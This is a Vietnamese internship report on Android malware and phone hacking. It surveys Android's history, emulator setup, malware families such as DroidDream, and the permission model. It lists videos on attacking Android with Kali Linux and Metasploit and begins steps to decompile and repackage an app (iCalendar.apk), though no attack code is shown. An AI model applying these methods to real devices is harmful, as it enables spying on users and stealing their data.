Professional Documents
Culture Documents
LỜI CẢM ƠN
KHOA KHOA HỌC VÀ KỸ THUẬT MÁY TÍNH
Tôi xin chân thành cảm ơn trường Đại học Bách Khoa thành phố Hồ Chí
Minh khoa Khoa Học và Kỹ Thuật Máy Tính đã tạo điều kiện cho tôi tham gia và
hoàn thành tốt đợt thực tập này. Để cho tôi được làm việc và học hỏi và làm việc
trong môi trường chuyên nghiệp với những kinh nghiệm hữu ích. Những kinh
nghiệm này sẽ giúp tôi hoàn thiện hơn trong công việc sau này.
Tôi cũng xin cảm ơn quý thầy trong khoa đã tận tình giảng dạy và trang bị
cho tôi những kiến thức thiết yếu để hoàn thành đợt thực tập này.
Một lần nữa, tôi xin chân thành cảm ơn.
Hồ Chí Minh, Ngày 18 tháng 8 Năm 2014
Sinh viên thực tập
Nguyễn Đức Thái
LỜI CẢM ƠN
TRUNG TÂM ATHENA
Tôi xin chân thành cảm ơn Ban giám đốc Trung Tâm Đào Tạo Quản Trị
Mạng & An Ninh Mạng Quốc Tế Athena, toàn thể các anh chị trong công ty đã tận
tình giúp đỡ tôi trong đợt thực tập vừa qua, tạo điều kiện để tôi có cơ hội tham gia
và hoàn thành thực tập tại trung tâm.
Đặc biệt, tôi xin chân thành cảm ơn thầy Võ Đỗ Thắng đã tận tình giúp đỡ,
cung cấp tài liệu tham khảo, hướng dẫn tôi để có thể hoàn thành đề tài tốt nhất.
Mặc dù đã cố gắng hoàn thành báo cáo thực tập tốt nhất với tất cả nỗ lực của
bản thân nhưng do năng lực hiểu biết và kinh nghiệm bản thân chắc chắn không
tránh khỏi thiếu sót nhất định, rất mong được sự thông cảm, chia sẻ tận tình để tôi
hoàn thành bản báo cáo thực tập tốt hơn.
Một lần nữa, tôi xin chân thành cảm ơn.
TRÍCH YẾU
Trong số những thành tựu quan trọng nhất mà nhận loại đạt được trong thời
gian gần đây đó là những phát triển nhảy vọt của kỹ thuật truyền thông. Đặc biệt
đó là điện thoại di động, khi mà con người có thể giao tiếp với nhau bất chấp
khoảng cách. Chúng ta đã quá quen với những chiếc điện thoại di động luôn ở bên
mình mọi lúc mọi nơi, đơn giản vì tính tiện lợi và hữu ích của nó. Chúng ta có thể
nghe, gọi, nhắn tin, lướt web, xem video, … thậm chí còn thực hiện các giao dịch
ngân hàng.
Điện thoại di động có chứa hầu hết thông tin cá nhân của người sử dụng như
địa chỉ nhà, tài khoản ngân hàng, những hồ sơ quan trọng,... Câu hỏi đặt ra, liệu
rằng những thông tin đó có thể nào bị đánh cắp không? Đề tài này sẽ cho chúng ta
một cái nhìn khái quát về việc đánh cắp, hack các thông tin, nghe lén,… trên điện
thoại di động, đặc biệt là điện thoại sử dụng hệ điều hành Android.
Tôi cam kết, kết quả đạt được do tôi tự thực hiện dưới sự hướng dẫn của
thầy Võ Đỗ Thắng (Trung tâm Athena), không sao chép từ người khác. Các bước
của quá trình thực hiện được tôi ghi lại bằng video và có thuyết minh từng bước.
Chi tiết của các clip ghi lại quá trình thực hiện được liệt kê bên dưới.
Danh sách các Clip:
1. Giới thiệu đề tài.
http://youtu.be/7D7qH5P5UD8
2. Tìm hiểu mã độc trên Android và cài đặt iCalendar.
http://youtu.be/mldXNwKSt_4
3. Cài đặt iMatch.
http://youtu.be/D7HWiixk2sU
4. Tìm hiểu và cài đặt Kali Linux.
http://youtu.be/LN-m6868hV8
5. Sử dụng Kali Linux tấn công Android trong mạng LAN.
http://youtu.be/7km1lwNr1Cg
6. Cài đặt Metasploit trên máy chủ ảo VPS
http://youtu.be/lFGBUVgDhk8
7. Sử dụng Merasploit trên VPS tấn công Android trên mạng internet.
http://youtu.be/6s6lYJngkXs
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
TPHCM, ngày ... tháng ... năm 2014
Trưởng Khoa
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
TPHCM, ngày ... tháng ... năm 2014
Giám đốc
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
TPHCM, ngày ... tháng ... năm 2014
Giáo viên hướng dẫn
MỤC LỤC
LỜI CẢM ƠN KHOA KHOA HỌC VÀ KỸ THUẬT MÁY TÍNH ..................... i
LỜI CẢM ƠN TRUNG TÂM ATHENA .............................................................. ii
TRÍCH YẾU ......................................................................................................... iii
NHẬN XÉT CỦA KHOA .................................................................................... iv
NHẬN XÉT CỦA CÔNG TY THỰC TẬP ...........................................................v
NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN.................................................. vi
MỤC LỤC ........................................................................................................... vii
DANH MỤC HÌNH ................................................................................................x
DANH MỤC BẢNG .......................................................................................... xiii
CHƯƠNG 0: GIỚI THIỆU CHUNG VỀ CÔNG TY THỰC TẬP .......................1
CHƯƠNG 1: TỔNG QUAN VỀ ANDROID. .......................................................3
1.1. Khái niệm. ....................................................................................................3
1.2. Đặc điểm. ......................................................................................................3
1.3. Lịch sử phát triển ..........................................................................................4
1.4. Sự ra mắt các phiên bản Android .................................................................5
CHƯƠNG 2: CÀI ĐẶT VÀ NGHIÊN CỨU HỆ ĐIỀU HÀNH ANDROID
TRÊN MÔI TRƯỜNG GIẢ LẬP...........................................................................7
2.1. Cài đặt hệ điều hành Android 2.3 và 4.x trên môi trường giả lâp. ...............7
2.1.1. Cài đặt Java SE trên máy tính. ...............................................................7
2.1.2. Cài đặt Eclipse và Android SDK ...........................................................9
2.1.3. Tạo máy AVD (Android Virtual Device). ...........................................11
2.2. So sánh sự khác nhau giữa hai phiên bản Android 2.3 và 4.x. ..................15
2.2.1. Sự khác nhau về yêu cầu phần cứng cần thiết để cài đặt. ....................15
2.2.2. Sự khác nhau về giao diện. ..................................................................15
2.2.3. Sự khác nhau về tính năng. ..................................................................17
2.2.4. Sự khác nhau về giao thức mạng. ........................................................17
CHƯƠNG 3: MÃ ĐỘC TRÊN ANDROID. ........................................................18
3.1. Định nghĩa. .................................................................................................18
3.2. Mã độc trong môi trường Android. ............................................................18
3.2.1. Android là một môi trường lý tưởng cho mã độc phát triển. ...............18
3.2.2. Phân loại mã độc Android....................................................................18
Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA
được thành lập từ năm 2004, là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam
đầy năng động, nhiệt huyết và kinh nghiệm trong lãnh vực CNTT, với tâm
huyết góp phần vào công cuộc thúc đẩy tiến trình đưa công nghệ thông tin là
ngành kinh tế mũi nhọn, góp phần phát triển nước nhà.
Lĩnh vực hoạt động:
Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo chuyên sâu
quản trị mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc tế
của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI, CEH... Song
song đó, trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành
riêng theo đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An, ngân
hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính…
Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA
đã là chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng
cho nhiều bộ ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công
An, Sở Thông Tin Truyền Thông các tỉnh, bưu điện các tỉnh,…
Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều chương trình
hợp tác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa
Thành Phố Hồ Chí Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện
Bưu Chính Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật
Quân Sự…
Android ra mắt vào năm 2007 cùng với sự tuyên bố thành lập Liên minh thiết
bị cầm tay mở gồm 78 công ty phần cứng, phần mềm và viễn thông với mục tiêu
đẩy mạnh các tiêu chuẩn mở cho các thiết bị di động. Hệ điều hành Android bao
gồm 12 triệu dòng mã: 3 triệu dòng XML, 2.8 triều dòng mã C, 1.75 triệu dòng mã
C++ và 2.1 triệu dòng mã Java. Thể hiện tính mở của Android, Google công bố
hầu hết các mã nguôn của Android theo bản cấp phép Apache.
- Tính ngang bằng của ứng dụng: Với Android, không có sự khác nhau
giữa các ứng dụng điện thoại cơ bản với ứng dụng của bên thứ ba. Chúng được
xây dựng để truy cập như nhau tới một loạt các ứng dụng và dịch vụ của điện thoại.
Với các thiết bị được xây dựng trên nền tảng Android, người dùng có thể đáp ứng
đầy đủ các nhu cầu mà họ thích. Chúng ta có thể đổi màn hình nền, kiểu gọi điện
thoại, hay bất kể ứng dụng nào. Chúng ta thậm chí có thể hướng dẫn điện thoại chỉ
xem những ảnh mình thích.
- Phá vỡ rào cản phát triển ứng dụng: Android phá vỡ rào cản để tạo ứng
dụng mới và cải tiến. Một người phát triển có thể kết hợp thông tin từ trang web
với dữ liệu trên điện thoại cá nhân – chẳng hạn như danh bạ, lịch hay vị trí trên
bản đồ – để cung cấp chính xác hơn cho người khác. Với Android, người phát triển
có thể xây dựng một ứng dụng mà cho phép người dùng xem vị trí của những
người bạn và thông báo khi họ đang ở vị trí lân cận. Tất cả được lập trình dễ dàng
thông qua sự hỗ trợ của MapView và dịch vụ định vị toàn cầu GPS.
- Xây dựng ứng dụng dễ dàng và nhanh chóng: Android cung cấp bộ thư
viện giao diện lập trình ứng dụng đồ sộ và các công cụ để viết các ứng dụng phức
tạp. Ví dụ, Android có thể cho phép người phát triển biết được vị trí của thiết bị và
cho phép các thiết bị giao tiếp với nhau để có thể tạo nên mạng xã hội chia sẻ
ngang hàng rộng khắp. Thêm nữa, Android còn bao gồm một bộ công cụ đầy đủ
giúp cho việc phát triển trở nên dễ dàng.
Ngày 17 tháng 8 năm 2005, Google mua lại Tổng công ty Android biến nó
thành một bộ phận trực thuộc của mình đồng thời giữ cũng giữ lại các nhân viên
chủ chốt gồm Rubin, Miner và While. Hành động này dẫn đến nhiều tin đồn cho
rằng Google dự tính tham gia vào thị trường điện thoại di động. Tại Google, nhóm
do Rubin đứng đầu đã phát triển một nền tảng thiết bị di động phát triển trên nền
nhân Linux được Google quảng bá đến các nhà sản xuất điện thoại di động như là
một hệ thống uyển chuyển và có khả năng nâng cấp. Google đã liên hệ với hàng
loạt hãng phần cứng cũng như đối tác phần mềm, bắn tin cho các nhà mạng rằng
họ sẵn sàng hợp tác với các cấp độ khác nhau.
Ngày 5 tháng 11 năm 2007, Liên minh thiết bị cầm tay mở (Open Handset
Alliance), một hiệp hội bao gồm nhiều công ty với cả những gã khổng lồ như Texas
Instruments, Tập đoàn Broadcom, Google, HTC, Intel, LG, Tập đoàn Marvell
Technology, Motorola, Nvidia, Qualcomm, Samsung Electronics, Sprint Nextel và
T-Mobile được thành lập với mục đích phát triển các tiêu chuẩn mở cho thiết bị di
động. Cùng ngày, Android cũng được ra mắt với vai trò là sản phẩm đầu tiên của
Liên minh, một nền tảng thiết bị di động được xây dựng trên nhân Linux phiên bản
2.6. Chiếc điện thoại chạy Android đầu tiên được bán ra là HTC G1, phát hành
ngày 22 tháng 10 năm 2008. Biểu trưng của hệ điều hành Android mới là một con
rôbốt màu xanh lá cây do hãng thiết kế Irina Blok tại California vẽ.
Từ năm 2008, Android đã trải qua nhiều lần cập nhật để dần dần cải tiến hệ
điều hành, bổ sung các tính năng mới và sửa các lỗi trong những lần phát hành
trước. Mỗi bản nâng cấp được đặt tên lần lượt theo thứ tự bảng chữ cái, theo tên
của một món ăn tráng miệng; ví dụ như phiên bản 1.5 Cupcake (bánh bông lan nhỏ
có kem) tiếp nối bằng phiên bản 1.6 Donut (bánh vòng). Phiên bản mới nhất hiện
nay là Android 4.4 và Android L (dành cho nhà phát triển) được phát hành vào
năm 2014.
- Android beta: được phát hành vào ngày 5 tháng 7 năm 2007. Tiếp theo đó
bộ phát triển phần mềm (SDK) ra mắt ngày 12 tháng 11 năm 2007.
- Android 1.0 (API mức độ 1): Kỉ nguyên Android chính thức khởi động vào
ngày 22 tháng 10 năm 2008, khi mà chiếc điện thoại T-Mobile G1 chính thức được
bán ra ở Mỹ. Đến ngày 23 tháng 9 năm 2008, Google chính thức bán ra phiên bản
thương mại của phần mềm.
- Android 1.1 (API mức độ 2): phát hành ngày 9 tháng 2 năm 2009. Đây là
bản cập nhật đầu tiên giúp giải quyết lỗi, thay đổi Android API và thêm vào một
số tính năng.
- Android 1.5 (API mức độ 3, phát hành ngày 27 tháng 4 năm 2009) và
Android 1.6 (API mức độ 4, phát hành ngày 15 tháng 9 năm 2009): Bản cập nhật
bao gồm một số tính năng mới và sử đổi giao diện người dùng UI.
- Android 2.x (2.0-2.1 API mức độ 7, 2.2 API mức độ 8, 2.3-2.3.2 API mức
độ 9, 2.3.3-2.3.7 API mức độ 10): phát hành từ tháng 10 năm 2009 đến tháng 2
năm 2011 với nhiều tính năng mới được thêm vào, thay đổi giao diện người dùng
cũng như nâng cao khả năng bảo mật.
- Android 3.x (3.1 API mức độ 12, 3.2 API mức độ 13) phát hành từ tháng 5
đến tháng 7 năm 2011 với tên gọi Honeycomb là phiên bản dành riêng cho máy
tính bảng. Mặc dù không để lại nhiều dấu ấn đắc biệt trên thị trường nhưng phiên
bản này là nền tảng cho Android 4.0.
- Android 4.x (từ API mức độ 15 đến API mức độ 19) phát hành từ tháng 12
năm 2011 và tiếp tục đến nay. Được xem là sự thay đổi lớn trong lịch sử phát triển
của Android với nhiều cải tiến về mặt công nghệ cung như tính năng. Đặc biệt
phiên bản này là sự hợp nhất cho hệ điều hành smartphone và máy tính bảng.
- Android 5 (API mức độ 20): phát hành tháng 7 năm 2014 là phiên bản cho
nhà phát triển.
Theo sự kiên GOOGLE I/O năm 2013 đã thống kê rằng thị phần của hai nền
tảng Android 2.3 va Android 4.x vẫn được ưa chuộng nhất (38.5% và 33.0%) vì
thế tiếp theo chúng ta chủ yếu tìm hiểu 2 phiên bản này.
Để cài đặt Android trên môi trường giả lập trước tiên cần cài đặt môi trường
Java For Developers để chạy được Eclipse và Android SDK. Ở đây mình sử dụng hệ
điều hành Windows 8 64-bit (các phiên bản Windows khác đều tương tự). Đầu tiên
bạn cần dowload bộ cài đặt Java SE tại link sau
http://www.oracle.com/technetwork/java/javase/downloads/index.html
Chọn Jaca Platform (JDK) 8u5 để chuyển sang trang tiếp theo.
Chọn phiên bản thích hợp với hệ điều hành để tải về. Ở đây mình chọn bản
cho Windows 64-bit.
Chạy bộ cài đặt vừa được tải về ta được như hình sau
Tiếp tục chọn Next để cài đặt và đợi tiến trình hoàn tất.
Sau khi cài xong, các bạn kiểm tra lại bộ JDK đã được cài đặt thành công
bằng cách vào cmd gõ lệnh “java”. Nếu màn hình hiện ra như sau thì bạn đã cài
đặt thành công:
Trước tiên download bộ ADT Bundle for Windows gồm Eclipse và Android
SDK được tích hợp sẵn tại địa chỉ: http://developer.android.com/sdk/index.html
Chọn phiên bản thích hợp va tiến hành dowload (như hình). Sau khi tải xong
tiến hành giải nén ta được các file như hình:
- Cách 1: Các bạn click chuột vào biểu tượng SDK Manager ở ngoài và
tiến hành cài đặt.
- Cách 2: Các bạn khởi chạy Eclipse lên. Rồi vào mục Android SDK
Manager
Hình 2.10: Chọn và cài đặt các gói API cần thiết.
Công việc tiếp theo là các bạn chỉ cần tích chọn các phần API cần cài rồi
click vào nút Install packages ở góc dưới bên phải và chờ cho nó download và cài
đặt là xong.
Sau khi khởi chạy xong Eclipse. Bạn vào: Windows -> Android Virtual
Device Manager.
Hoặc các bạn cũng có thể click ngay vào biểu tượng AVD trên menu
của Eclipse:
Cửa sổ mới mở ra, các bạn điền đầy đủ các thông số vào theo yêu cầu:
- AVD Name: Các bạn chỉ được sử dụng cách ký tự: A -> Z, a -> z, và “.,
-, _” mà thôi.
- Target: Bạn chọn phiên bản Android để test.
- SD Card: Là dung lượng bộ nhớ ảo của thẻ SD.
Bây giờ bạn vào phần Android Virtual Device Manager như ban đầu thì
bạn sẽ thấy tên máy ảo mới mình vừa tạo rồi.
Nhấn Start để khởi chạy máy ảo (bạn có thể sẽ phải chờ một khoảng thời
gian để máy ảo khởi chạy):
2.2. So sánh sự khác nhau giữa hai phiên bản Android 2.3 và 4.x.
2.2.1. Sự khác nhau về yêu cầu phần cứng cần thiết để cài đặt.
Cần ít nhất 128 MB bộ nhớ có sẵn cho Cần ít nhất 340 MB bộ nhớ có sẵn cho
Kernel và cho không gian người sử dụng kernel và cho không gian người sử dụng
Dung lượng Ram tối thiểu cần thiết là Dung lượng Ram tối thiểu cần thiết là
150MB 350 MB
- Màn hình phải có kích cỡ ít nhất - Màn hình phải có kích cỡ ít nhất
2,5 inch 426x320
- Mật độ phải được ít nhất 100 dpi - Mật độ phải được ít nhất 100 dpi
- Tỉ lệ màn hình từ 1.333 (4:3) đến - Tỉ lệ màn hình từ 1.333 (4:3) đến
1,779 (16:9) 1,85 (16:9)
- Công nghệ màn hình được sử
dụng là công nghệ “ Square pixels”
Yêu cầu có các phím vậy lý Không yêu cầu có có phím vật lý
Các API Android bao gồm trình quản Các API Android bao gồm trình quản
lý download các ứng dụng có thể sử lý download các ứng dụng có thể sử
dụng để tải dữ liệu.Trình quản lí dụng để tải dữ liệu.Trình quản lí
download phải có khả năng tải tập tin có download phải có khả năng tải tập tin có
dung lượng ít nhất 55 MB dung lượng ít nhất 100 MB
Giao diện người dùng của Android dựa trên nguyên tắc tác động trực tiếp, sử
dụng cảm ứng chạm tương tự như những động tác ngoài đời thực như vuốt, chạm,
kéo dãn và thu lại để xử lý các đối tượng trên màn hình. Sự phản ứng với tác động
của người dùng diễn ra gần như ngay lập tức, nhằm tạo ra giao diện cảm ứng mượt
mà, thường dùng tính năng rung của thiết bị để tạo phản hồi rung cho người dùng.
Những thiết bị phần cứng bên trong như gia tốc kế, con quay hồi chuyển và cảm
biến khoảng cách được một số ứng dụng sử dụng để phản hồi một số hành động
khác của người dùng, ví dụ như điều chỉnh màn hình từ chế độ hiển thị dọc sang chế
độ hiển thị ngang tùy theo vị trí của thiết bị, hoặc cho phép người dùng lái xe đua
bằng xoay thiết bị, giống như Các thiết bị Android sau khi khởi động sẽ hiển thị
màn hình chính, điểm khởi đầu với các thông tin chính trên thiết bị, tương tự
như khái niệm desktop (bàn làm việc) trên máy tính để bàn. Màn hính chính
Android thường gồm nhiều biểu tượng (icon) và tiện ích (widget); biểu tượng ứng
dụng sẽ mở ứng dụng tương ứng, còn tiện ích hiển thị những nội dung sống động,
cập nhật tự động như dự báo thời tiết, hộp thư của người dùng, hoặc những mẩu
tin thời sự ngay trên màn hình chính. Màn hình chính có thể gồm nhiều trang xem
được bằng cách vuốt ra trước hoặc sau, mặc dù giao diện màn hình chính của
Android có thể tùy chỉnh ở mức cao, cho phép người dùng tự do sắp đặt hình dáng
cũng như hành vi của thiết bị theo sở thích.
Những ứng dụng do các hãng thứ ba có trên Google Play và các kho ứng
dụng khác còn cho phép người dùng thay đổi "chủ đề" của màn hình chính, thậm
chí bắt chước hình dáng của hệ điều hành khác như Windows Phone chẳng hạn.
Phần lớn những nhà sản xuất, và một số nhà mạng, thực hiện thay đổi hình dáng và
hành vi của các thiết bị Android của họ để phân biệt với các hãng cạnh tranh. Ở phía
trên cùng màn hình là thanh trạng thái, hiển thị thông tin về thiết bị và tình trạng
kết nối. Thanh trạng thái này có thể "kéo" xuống để xem màn hình thông báo
gồm thông tin quan trọng hoặc cập nhật của các ứng dụng, như email hay tin nhắn
SMS mới nhận, mà không làm gián đoạn hoặc khiến người dùng cảm thấy bất tiện.
Trong các phiên bản đời đầu, người dùng có thể nhấn vào thông báo để mở ra ứng
dụng tương ứng, về sau này các thông tin cập nhật được bổ sung theo tính năng,
như có khả năng lập tức gọi ngược lại khi có cuộc gọi nhỡ mà không cần phải mở
ứng dụng gọi điện ra. Thông báo sẽ luôn nằm đó cho đến khi người dùng đã đọc hoặc
xóa nó đi.
Giao diện đơn giản Giao diện tinh tế hơn, trong suốt và
đẹp mắt hơn
Chỉ hỗ trợ phím ảo là phím Home Hỗ trợ các phím ảo: Home, Back,
Zoom
Thiết kế tối ưu hóa cho Smartphone Thiết kế tối ưu hóa cho Smartphone và
Tablet
Chỉ có thể xóa tất các các thông báo Chỉ có thể xóa riêng rẽ các thông báo
cùng lúc trên trình quản lý cùng lúc trên trình quản lý
Chỉ có thể trả lời, ngắt cuộc gọi khi Có thể thực hiện thêm 1 số tính năng
màn hình bị khóa khi màn hình bị khoái ngoài trả lời , ngắt
cuộc gọi như gửi tin nhắn
Không có tính năng mở khóa màn hình Có tính năng mở khóa màn hình nhận
nhận diện khuôn mặt diện khuôn mặt
Không hỗ trợ chỉnh sửa hình ảnh Hỗ trợ chỉnh sửa hình ảnh , tự động
nhận diện được tất cả các camera trên
thiết bị
- Phá hoại hệ thống máy tính như xóa, sửa, làm hỏng file, dữ liệu….
- Phát tán thư rác.
- Lợi dụng máy tính của bạn làm công cụ tấn công các hệ thống mạng máy
tính khác.
- Đánh cắp thông tin: thông tin về địa chỉ mail, thông tin cá nhân, tài khoản
ngân hàng, thẻ tín dụng,….
Phần lớn các smartphone đều hỗ trợ các ứng dụng email, internet baking…Sử
dụng các ứng dụng này đồng nghĩa với việc cung cấp thông tin cá nhân.
Android hiện tại giữ vị trí số một trong các hệ điều hành dành cho smartphone
và máy tính bảng.
Có nhiều cách phân loại khac nhau như: Troy Vennon dựa vào cách hoạt
động lây nhiễm của mã độc đã chia ra làm bốn loại, K.H.Khan & M.N.Tahir phân
loai mã độc làm 6 nhóm. Theo trang web forenics chuyên nghiên cứu về mã độc
dựa vào mục tiêu của mã độc để chia ra làm 9 họ:
51,3%
Đánh cấp thông tin cá nhân
30,1%
Gửi tin nhắn trái phép (IMEL,..)
23,5%
Botnet(spam, thư rác,..)
18,3%
Truy cập Root
11,3%
Tải từ Google-Play
10,4%
Cài đặt các ứng dụng khác
8,7%
Đánh cấp định vị của người dùng
7,8%
Cài đặt các ứng dụng hỗ trợ hacker
3,5%
Trojans (tiếp cận các dịch vụ ngân hàng trực tiếp)
Bảng 3.1: Phân loại mã độc Android.
Một báo cáo mới vừa được công bố, cho thấy mức độ nghiêm trọng của mã
độc trên Android - hệ điều hành di động phổ biến nhất thế giới có đến 99,9% số
lượng mã độc mới được phát hiện trong quý I năm 2013 được thiết kế để nhắm
đến nền tảng Android. Đây là một con số báo động về tình trạng mã độc trên nền
tảng di động của Google vừa được hãng bảo mật Kaspersky Lab công bố.
Phần lớn trong số các loại mã độc trên Android là virus trojan, một dạng virus
chủ yếu để sử dụng để đánh cắp tiền của người dùng bị lây nhiễm bằng cách gửi
đến họ những tin nhắn lừa đảo, đọc lén các thông tin cần thiết và gửi báo cáo đến
nơi khác, ăn cắp thông tin như là mật khẩu và số thẻ tín dụng, cài đặt lén các phần
mềm chưa được cho phép, ….. Loại mã độc này chiếm đến 63% tổng số các loại
mã độc mới được phát tán trên Android trong quý I năm 2013.
Các nhà nghiên cứu bảo mật của Kaspersky cũng báo cáo một sự bùng nồ về
số lượng các mã độc hại trên di động. Theo đó chỉ tính riêng trong 3 tháng đầu
năm 2013, Kaspersky đã phát hiện được số lượng mã độc mới trên các nền tảng di
động bằng tổng số lượng mã độc được phát hiện trong cả năm 2012 mà Android
là nền tảng chịu ảnh hưởng nặng nhất.
Với việc Android tiếp tục trở thành “mồi ngon” của hacker trong việc phát
tán các loại mã độc, có vẻ như Android đang dần trở thành một “Windows thứ 2”
trên lĩnh vực bảo mật, khi sự phổ biến của nền tảng này đang thu hút tối đa sự chú
ý của các tin tặc, đồng thời việc quản lý các ứng dụng cho Android một cách lỏng
lẻo càng tạo điều kiện cho mã độc được phát tán dễ dàng hơn trên nền tảng di động
này.
Bên cạnh lĩnh vực mã độc trên nền tảng di động, báo cáo về tình trạng bảo
mật trong quý 1/2013 của Kaspersky cũng cho biết 91% các vụ phát tán mã độc
chủ yếu dựa vào việc phát tán các đường link trang web có chứa mã độc. Các
đường link có chứa mã độc này chủ yếu được phát tán thông qua email và trên các
mạng xã hội như Facebook, Twitter… Đây được xem là biện pháp được yêu thích
nhất hiện nay của hacker.
Con số cụ thể các loại mã độc (bao gồm cả trên nền tảng di động và các nền
tảng khác) đã được Kaspersky phát hiện và vô hiệu hóa trong quý I năm 2013 là
1.345.570..352 mã độc (hơn 1 tỉ mã độc). Trong đó có hơn 60% các loại mã độc
phát tán từ 3 quốc giá: Mĩ (25%), Nga (19%) và Hà Lan (14%).
Malware (phần mềm ác tính) viết tắt của cụm từ Malicious Sofware, là một
phần mềm máy tính được thiết kế với mục đích thâm nhập hoặc gây hỏng hóc máy
tính mà người sử dụng không hề hay biết. Người viết nên nó ban đầu chỉ tập trung
vào máy tính, nhất là Windows khi nó chiếm đến 90% tổng số Malware xuất hiện
trên các nền tảng, bên cạnh đó là các OS khác như Linux, Chrome OS, MacOs...
nhưng không đáng kể. Tuy nhiên giờ đây khi smartphone đang ngày càng phát
triển và phổ biến dần thay thế máy tính từ các công việc soạn thảo văn bản, giải trí
đến giao dịch ngân hàng thì nó trở thành mục tiêu tấn công của Malware.
Theo thống kê của các hãng bảo mật trên thế giới thì hiện các Malware hiện
nay mới chỉ dừng lại ở mức độ xâm nhập và ăn cắp thông tin của người dùng và
nó chưa có cơ chế lây lan. Theo các kết quả trên thì Malware trên Smartphone hiện
nay về cách thức hoạt động giống như một phần mềm gián điệp (Trojan), phần lớn
nhắm vào dịch vụ Mobile Banking trên Smartphone để lấy cắp thông tin, các thao
tác xác nhận... thông qua việc sử dụng SMS Spy, tức là theo dõi tin nhắn SMS khi
bạn thực hiện giao dịch với ngân hàng. Bên cạnh đó là nhằm vào các cuộc gọi thực
hiện trên máy bạn, tắt một số dịch vụ để dễ kiểm soát.
- Giai đoạn 1: DroidDream được nhúng vào trong một ứng dụng (số lượng
ứng dụng chứa Malware này hiện đã nhiều hơn 50 ứng dụng) và sẽ chiếm được
quyền root vào thiết bị của bạn ngay sau khi bạn chạy ứng dụng đó trong lần sử
dụng đầu tiên.
- Giai đoạn 2: Tự động cài đặt một ứng dụng thứ 2 với một permission đặc
biệt cho phép quyền uninstall. Một khi các ứng dụng thứ 2 được cài đặt, nó có thể
gửi các thông tin nhạy cảm tới một máy chủ từ xa và âm thầm tải thêm các ứng
dụng khác Một khi DroidDream chiếm được quyền root, Malware này sẽ chờ đợi
và âm thầm cài đặt một ứng dụng thứ hai, DownloadProviderManager.apk như
một ứng dụng hệ thống. Việc cài đặt ứng dụng hệ thống này nhằm ngăn ngừa người
dùng xem hoặc gỡ bỏ cài đặt các ứng dụng mà không được phép.
Không giống như giai đoạn 1, người dùng phải khởi động ứng dụng để bắt
đầu việc lây nhiễm, ở giai đoạn thứ 2 ứng dụng tự động làm một số việc như là
confirm, checkin….Một điều nữa khiến cho bạn không thể biết chúng hoạt động
lúc nào, đó là Malware DroidDream này được lập trình để làm hầu hết các công
việc của mình vào khoảng thời gian từ 11h đêm tới 8h sáng ngày hôm sau. Đây là
khoảng thời gian mà điện thoại ít có khả năng được sử dụng nhất. Điều này làm
cho người dùng khó khăn hơn trong việc phát hiện một hành vi bất thường trên
chiếc smartphone của mình.
Hiện nay còn có một số Malware còn có khả năng nghe lén tất cả các cuộc
điện thoại. Vấn đề này thực sự nguy hiểm khi tất cả các vấn đề riêng tư của chúng
ta đang bị một theo dõi, vì vậy những mối nguy hiểm từ mã độc trên android đang
thực sự đe dọa đến an sự an toàn của người dùng hệ điều hành này.
- Các ứng dụng android được tách biệt với nhau trong quá trình thực thi.
- Các ứng dụng android được phân biệt bởi system ID.
- Các ứng dụng android phải được signing mới có thể cài đặt vào hệ thồng.
- Bảo mật trong android được thể hiện qua cơ chế “Permission”
Bất cứ những tác vụ nào gây ảnh hưởng cho các ứng dụng khác, hệ điều hành
và người sử dụng thiết bị đều đươc bảo vệ bởi cơ chế Permission, ví dụ như đọc
gửi tin nhắn, truy cập mạng, thực hiện cuộc gọi, truy cập vào thông tin cá
nhân,..Nói cách khác người lập trinh ứng dụng sẽ khai báo Permission cho những
nguông tài nguyên này sẽ được thông báo đến người dùng trước khi cài đặt ứng
dụng.
Chọn và khởi động phiên bản phù hợp với hệ điều hành.
Tại màn hình chính của Super Apk Tool chọn Project -> New Project
Tại cửa sổ hiện ra tìm đến thư mục lưu trữ file iCalendar.apk và mở ra. Đặt
tên cho project tại mục Project Name (có thể để mặc định) -> chọn Ok để xác
nhận. Đợi chương trình giải mà ngược xong ta được như hình. Vào View -> View
Smali Code.
Chọn máy Android dùng để cài đặt (Android01 có mã 5554) sau đó vào Run
=> Build (hoặc ấn F5). Chương trình sẽ tự động đóng gói project thành file apk,
